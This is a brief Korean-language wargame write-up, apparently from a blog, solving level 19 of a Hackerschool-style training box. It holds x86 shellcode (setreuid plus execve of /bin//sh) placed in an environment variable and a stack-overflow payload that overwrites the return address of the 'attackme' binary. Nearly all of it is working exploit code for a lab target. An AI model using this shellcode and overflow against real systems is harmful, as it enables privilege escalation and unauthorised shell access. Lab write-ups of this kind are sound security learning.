SMALL
level19 // swimming in pink
심플한 코드이다.
환경변수를 이용해 ret에 그 주소를 넣어줘야 겠다.
export SH=`python -c 'print "\x90"*100+"\x31\xc0\x31\xdb\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
(python -c 'print "\x90"*44+"\x60\xfe\xff\xbf"';cat)|./attackme
성공!?!? ...? 실패였다. 확인해보니 다른 코드와는 달리 setreuid가 없는게 차이점이였다.
level20의 setreuid가 설정되어 있는 쉘코드를 다시 작성해야겠다.
쉘코드 : \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
export SH=`python -c 'print "\x90"*100+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
(python -c 'print "\x90"*44+"\x58\xfe\xff\xbf"';cat)|./attackme
성공!!